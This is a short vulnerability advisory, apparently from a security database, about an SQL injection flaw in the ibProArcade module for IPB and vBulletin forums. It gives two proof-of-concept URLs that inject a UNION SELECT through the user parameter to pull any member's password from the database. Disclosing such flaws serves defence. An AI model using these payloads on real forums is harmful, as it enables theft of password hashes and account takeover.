ibProArcade User ID SQL Injection Vulnerability

info
discussion
exploit
solution
references

ibProArcade User ID SQL Injection Vulnerability

The following proof of concept URLs were provided:

IPB:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]
vBulettin forums:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]